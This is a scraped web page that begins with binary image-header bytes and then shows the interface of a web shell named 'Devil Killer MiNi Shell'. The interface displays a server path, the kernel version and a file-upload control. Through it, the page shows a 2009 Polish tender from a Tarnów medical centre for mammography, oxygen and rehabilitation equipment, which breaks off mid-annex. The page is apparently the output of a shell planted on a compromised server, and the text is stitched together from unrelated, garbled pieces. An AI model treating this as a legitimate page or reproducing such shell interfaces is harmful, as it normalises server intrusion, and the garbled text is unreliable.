JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090316/63722-N-2009.html

<p class="kh_header"><b>Tarnów: ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH</b><br>
<b>Numer ogłoszenia: 63722 - 2009; data zamieszczenia: 16.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mościckie Centrum Medyczne Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kwiatkowskiego 15, 33-101 Tarnów, tel. 014 6300555, faks 014 6300555 w. 111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcm.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet Nr 1
L.p.	Nazwa 	Ilość
1	Wywoływarka automatyczna dedykowana do zdjęć mammograficznych (opis wymaganych parametrów  technicznych zawiera zał. nr 5)   
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.
2	Densytometr (dokładność odczytu + - 0,02 dla gęstości optycznej 1,0; powtarzalność odczytu + - 1%)
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.
3	Miernik siły kompresji piersi (dokładność wskazań + - 10 %, powtarzalność + - 5 %)
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.
4	Lupa do oceny rozdzielczości obrazu (powiększenie 5 - 10 razy)	1 szt.
5	Płyn do oceny ilości utrwalacza na filmie z paskiem wzorcowym	1 szt.
6	Fantom do kontroli przylegania ekranu wzmacniającego do filmu. Siatka gęstości 40 metalowych drutów cal, 1.5 drutu mm	1 szt.

Pakiet Nr 2
L.p.	Nazwa 	Ilość
1	Lampa terapeutyczna emitująca promieniowanie UVA, UVB lub UVA1 do foto lub fotochemioterapii spełniająca wymagania Narodowego Funduszu Zdrowia przeznaczona do świadczenia usług w Poradni Dermatologicznej. 
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.

Pakiet Nr 3
L.p.	Nazwa 	Ilość
1	Lampa światła spolaryzowanego       BIO -V  spełniająca wymagania Narodowego Funduszu Zdrowia przeznaczona do świadczenia usług  w Pracowni Fizjoterapii.
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.

Pakiet Nr 4
L.p.	Nazwa 	Ilość
1	Koncentrator tlenu:
- modułowa budowa,
- łatwy dostęp do materiałów eksploatacyjnych,
-interfejs diagnostyczny USB - znacznie ułatwia diagnostykę urządzenia, przyspiesza serwis,
- nowoczesny design i łatwość obsługi,
- wbudowany elektroniczny przepływomierz z pamięcią ustawień,
- bardzo cichy,
- kontrolowany w pełni mikroprocesorowo
Dane techniczne:
- Klasyfikacja: MDD IIa
- Napięcie: 230V 50 Hz
-Temperatura pracy: +10 do + 40 stopni Celsjusza
- Poziom hałasu: nie więcej niż 35 dB
- Zużycie energii: 350W
- Alarmy: Temperatury, zasilania, przepływu, tlenu
- Waga: nie więcej niż 19,8 kg
- Wymiary: nie więcej niż 535X203X520 mm
- Gwarancja: 5 lat
- Przepływ: 0-6l min
W komplecie:
- instrukcja obsługi
- komplet łączników
- komplet przedłużaczy
- nawilżacz
- kaniule donosowe różnej długości
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	2 szt.

Pakiet Nr 5
L.p.	Nazwa 	Ilość
1	Wózek inwalidzki ogólnego zastosowania
Właściwości:
- stalowo - aluminiowy                              o metalizowanej powłoce lakierniczej, składany,
- rama stalowa, wzmocniona, konstrukcji krzyżakowej, 
- ciągi metalowe,
- wersja z napędem ręcznym na kołach tylnych szprychowych, pompowanych,
- koła przednie bezobsługowe, pneumatyczne,
- koła tylne z systemem szybkiego demontażu,
- miękkie, nylonowe siedzisko                 i oparcie,
- szerokość siedziska 40 - 50 cm,
- podłokietniki uchylne w wersji krótkiej,
- podnóżki odchylane i zdejmowane,
- wózek wyposażony w hamulce stalowe z regulacją docisku,
	2 szt.

Pakiet Nr 6
L.p.	Nazwa 	Ilość
1	Aparat Ambu - resuscytator silikonowy Ambu wykonany zgodnie ze standardami ISO 8382 i ASM F920 oraz wymogami bezpieczeństwa.  przeźroczysty worek i maska nr 5 i 3 twarzowa,
- specjalny uchwyt  ułatwiający wentylację jedną ręką,
- zawór PEEP dołączany bezpośrednio (bez dodatkowych łączników),
- maksymalna objętość wdechu około 1500 ml,
- objętość worka resuscytatora około 2000 ml,
- waga resuscytatora z zaworem pacjenta, maską nr 5 i akumulatorem tlenu nie więcej niż 440 g,
- akumulator tlenu objętość około 2600 ml,
- zawór ograniczający ciśnienie (40 cm H2O),
- sterylizacja w autoklawie (do 1340C)
	1 szt.

Pakiet Nr 7
L.p.	Nazwa 	Ilość
1	Materac przeciwodleżynowy ( do łóżka rehabilitacyjnego kolumnowego DALI - charakterystyka łóżka załącznik Nr 5 do SIWZ) 200 x 90 x 10 cm - szpitalny w pokrowcu zmywalnym, para przepuszczalnym na zamek 	20 szt.
2	Mata - lekka składana 178 x 53 cm           z dwoma uchwytami, wygodna do przechowywania oraz poręczna               w noszeniu + przenośnik rolkowy 43 x 62 cm 	1 szt.

Pakiet Nr 8
L.p.	Nazwa 	Ilość
1	Pulsoksymetr - obszerny ekran dostosowany do przekazywania personelowi monitorującemu maksimum informacji o pacjencie, 24 godzinne trendy dostępne na ekranie, zaznaczanie zdarzeń oraz histogram. Proste i zrozumiałe wiadomości pozwalające na szybkie rozpoznanie problemów lub sytuacji alarmowych. Zaprojektowany z możliwością  dostosowania do każdego przypadku klinicznego.
Zasada działania- absorcja światła czerwonego i podczerwonego.
SpO2:
- zakres: 0-100%,
- dokładność: 80-100% ? 2 % (odchylenie standardowe),
- uśrednienie: do wyboru przez użytkownika 2 lub 8 sekund,
- audio: wysokość tonu pulsu związana z wartością ? SpO2.
Tętno:
- zakres: 30-250 ud.  min.,
- dokładność: ? 1% pełnej skali,
- rozdzielczość: 1 ud.  min.,
- uśrednienie: 8 sekundowe.
Czujniki:
- Y- Sensor wielokrotnego użytku      ( możliwość sterylizacji i stosowania u innych pacjentów) oraz wielorazowy czujnik na palec dla dorosłych i dzieci.
Alarmy:
- granice automatyczne i regulowane dla SpO2 i tętna,
- głośność audio regulowana,             2 minuty, cisza lub wyłączenie OFF,
- wizualnie: migające cyfry przy przekroczeniu limitów.
Komunikaty: brak czujnika SpO2, brak pacjenta, za słaby sygnał, słabe prześwietlenie, światło z zewnątrz, puls poza zakresem, czujnik uszkodzony, monitor niesprawny.
Obraz: matryca punktowa, ekran               o zmiennej katodzie (CCD)                       o wymiarach 12,7 x 3,08 cm.
Graficzny Trend  Histogram: pamięć 24 godz. zasilane dodatkowo                    z akumulatora.
Łącze wyjściowe - RS232 interfejs oprogramowania komputerowego NovaCard
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.

Pakiet nr 9
L.p.	Nazwa 	Ilość
1	Zestaw do badań antropometrycznych 
z oceną zawartości tłuszczu i wody spełniająca wymagania Narodowego Funduszu Zdrowia przeznaczona do świadczenia usług  w Por. Medycyny Sportowej.
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.

Pakiet Nr 10
L.p.	Nazwa 	Ilość
1	Stolik zabiegowy wykonany z rurek stalowych pokrytych powłoką niklowo -chromową,  posiadający dwie tace wykonane ze stali nierdzewnej. Całość osadzona na kółkach jezdnych umożliwiająca łatwe i ciche przemieszczania stolika w dowolne miejsce.	2 szt.

Pakiet nr 11
L.p.	Nazwa 	Ilość
1	Balkonik dwukołowy do nauki chodzenia (sprzęt pomocniczo - rehabilitacyjny przeznaczony do poruszania się osób starszych, niepełnosprawnych mających problemy z utrzymaniem równowagi: do asekuracji podczas chodzenia).
Opis:
 - wykonany z aluminium, 
- waga nie więcej niż 2,5 kg,
- estetyczny wygląd,
- maksymalne obciążenie do 127 kg, 
- regulowany: zakres regulacji wysokości od 508 do 880 mm,
- składany, łatwy w transporcie 	2 szt.
2	Kula łokciowa - z jednym punktem podparcia zakończonym nasadką               z tworzywa sztucznego, uchwytem           i podparciem przedramienia stałym. Wykonana z elementów metalowych łączonych z tworzywami sztucznymi. Regulacja skokowa wysokości co 2,5 cm, co pozwala na korzystanie z nich użytkownikom o wzroście od 155 do 185 cm. Kolor dowolny.	2 szt.
3	Laska ergonomiczna do prawej lub lewej ręki - waga: 0,25 kg, wytrzymałość: 120 kg. Posiadająca jeden punkt podparcia zakończony nasadką z tworzywa sztucznego. Wykonana z elementów metalowych łączonych z tworzywem sztucznym. Możliwość skokowa regulacji wysokości, co pozwala na korzystanie z nich użytkownikom o wzroście od 155 do 185 cm.	2 szt.

Pakiet Nr 12
L.p.	Nazwa 	Ilość
1	Linka do ćwiczeń samowspomaganych kończyn górnych  225 cm.
	1 szt.

Pakiet Nr 13 
L.p.	Nazwa 	Ilość
1	Urządzenie służące do ułatwiania w przemieszczaniu pacjenta. Składające się z 11 rolek o średnicy 25 mm połączonych na końcach. Rolki owinięte taśmą laminową. Dł. 80 cm, szer. 32 cm, wys. 2,5 cm.
	1 szt.

* Wykonawca zobowiązany jest do wpisania proponowanego czasu reakcji serwisu od momentu zgłoszenia (proponowany czas nie może być dłuższy niż 48 godz.).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.15.83.00-5, 33.15.78.00-3, 33.11.16.50-2, 33.19.31.20-6, 33.14.47.10-0, 33.14.17.20-3, 33.15.77.00-2, 39.14.31.12-4, 39.53.20.00-0, 37.42.00.00-8, 33.15.78.00-3, 33.00.00.00-1, 39.29.54.00-0, 33.19.60.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE ŻĄDA WNIESIENIA WADIUM.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymagania określone w art. 22 ust. 1 oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy Prawo Zamówień Publicznych, którzy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                  i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia:
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
- nie podlegają wykluczeniu z postępowania.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert).
2. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ( wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert).
3. Polisy, a w przypadku jej braku innego dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,

Inne oświadczenia i dokumenty, które Wykonawca zobowiązany jest dołączyć do oferty

1.	Załącznik Nr 1 - Wypełniony i podpisany formularz ofertowy.
2.	Załącznik Nr 2 - Oświadczenie.
3.	Załącznik Nr 3 -  Zaparafowany przez osoby uprawnione wzór umowy.
4.	Załącznik Nr 4 - Parametry techniczne wywoływarki
5.	Dokument potwierdzający oznakowanie CE.
6.	Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika.
7.	Opis techniczny oferowanych urządzeń w języku polskim w celu potwierdzenia spełnienia wymagań Zamawiającego.
8.	Zamawiający wymaga, aby Wykonawca dołączył do oferty dokumenty, o których mowa w ustawie z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz.U.93 poz.896 z późniejszymi zmianami). Dokumenty w języku angielskim powinny zostać dostarczone wraz z tłumaczeniem na język polski dokonanym przez tłumacza przysięgłego.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mcm.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mościckie Centrum Medyczne Samodzielny Publiczny Zakład Opieki Zdrowotnej 
33-101 Tarnów ul. Kwiatkowskiego 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 12:00, miejsce: Mościckie Centrum Medyczne Samodzielny Publiczny Zakład Opieki Zdrowotnej 
33-101 Tarnów ul. Kwiatkowskiego 15, Sekretariat pok. 131, I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 1
L.p.	Nazwa 	Ilość
1	Wywoływarka automatyczna dedykowana do zdjęć mammograficznych (opis wymaganych parametrów  technicznych zawiera zał. nr 5)   
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi        	1 szt.
2	Densytometr (dokładność odczytu +  - 0,02 dla gęstości optycznej 1,0; powtarzalność odczytu +  - 1%)
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.
3	Miernik siły kompresji piersi (dokładność wskazań + - 10 %, powtarzalność + - 5 %)
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt.
4	Lupa do oceny rozdzielczości obrazu (powiększenie 5 - 10 razy)	1 szt.
5	Płyn do oceny ilości utrwalacza na filmie z paskiem wzorcowym	1 szt.
6	Fantom do kontroli przylegania ekranu wzmacniającego do filmu. Siatka gęstości 40 metalowych drutów cal, 1.5 drutu mm	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.16.50-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2
L.p.	Nazwa 	Ilość
1	Lampa terapeutyczna emitująca promieniowanie UVA, UVB lub UVA1 do foto lub fotochemioterapii spełniająca wymagania Narodowego Funduszu Zdrowia przeznaczona do świadczenia usług w Poradni Dermatologicznej. 
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.83.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 3
L.p.	Nazwa 	Ilość
1	Lampa światła spolaryzowanego       BIO -V  spełniająca wymagania Narodowego Funduszu Zdrowia przeznaczona do świadczenia usług  w Pracowni Fizjoterapii.
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.83.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 4
L.p.	Nazwa 	Ilość
1	Koncentrator tlenu:
- modułowa budowa,
- łatwy dostęp do materiałów eksploatacyjnych,
-interfejs diagnostyczny USB - znacznie ułatwia diagnostykę urządzenia, przyspiesza serwis,
- nowoczesny design i łatwość obsługi,
- wbudowany elektroniczny przepływomierz z pamięcią ustawień,
- bardzo cichy,
- kontrolowany w pełni mikroprocesorowo
Dane techniczne:
- Klasyfikacja: MDD IIa
- Napięcie: 230V 50 Hz
-Temperatura pracy: +10 do + 40 stopni Celsjusza
- Poziom hałasu: nie więcej niż 35 dB
- Zużycie energii: 350W
- Alarmy: Temperatury, zasilania, przepływu, tlenu
- Waga: nie więcej niż 19,8 kg
- Wymiary: nie więcej niż 535x203x520 mm
- Gwarancja: 5 lat
- Przepływ: 0-6l min
W komplecie:
- instrukcja obsługi
- komplet łączników
- komplet przedłużaczy
- nawilżacz
- kaniule donosowe różnej długości
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi        	2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 5
L.p.	Nazwa 	Ilość
1	Wózek inwalidzki ogólnego zastosowania
Właściwości:
- stalowo - aluminiowy                              o metalizowanej powłoce lakierniczej, składany,
- rama stalowa, wzmocniona, konstrukcji krzyżakowej, 
- ciągi metalowe,
- wersja z napędem ręcznym na kołach tylnych szprychowych, pompowanych,
- koła przednie bezobsługowe, pneumatyczne,
- koła tylne z systemem szybkiego demontażu,
- miękkie, nylonowe siedzisko                 i oparcie,
- szerokość siedziska 40 - 50 cm,
- podłokietniki uchylne w wersji krótkiej,
- podnóżki odchylane i zdejmowane,
- wózek wyposażony w hamulce stalowe z regulacją docisku,
	2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.31.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 6
L.p.	Nazwa 	Ilość
1	Aparat Ambu - resuscytator silikonowy Ambu wykonany zgodnie ze standardami ISO 8382 i ASM F920 oraz wymogami bezpieczeństwa.  przeźroczysty worek i maska nr 5 i 3 twarzowa,
- specjalny uchwyt  ułatwiający wentylację jedną ręką,
- zawór PEEP dołączany bezpośrednio (bez dodatkowych łączników),
- maksymalna objętość wdechu około 1500 ml,
- objętość worka resuscytatora około 2000 ml,
- waga resuscytatora z zaworem pacjenta, maską nr 5 i akumulatorem tlenu nie więcej niż 440 g,
- akumulator tlenu objętość około 2600 ml,
- zawór ograniczający ciśnienie (40 cm H2O),
- sterylizacja w autoklawie (do 1340C)
	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.77.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 7
L.p.	Nazwa 	Ilość
1	Materac przeciwodleżynowy ( do łóżka rehabilitacyjnego kolumnowego DALI - charakterystyka łóżka załącznik Nr 5 do SIWZ) 200 x 90 x 10 cm - szpitalny w pokrowcu zmywalnym, para przepuszczalnym na zamek 	20 szt.
2	Mata - lekka składana 178 x 53 cm           z dwoma uchwytami, wygodna do przechowywania oraz poręczna               w noszeniu + przenośnik rolkowy 43 x 62 cm 	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4, 39.53.20.00-0.</li>
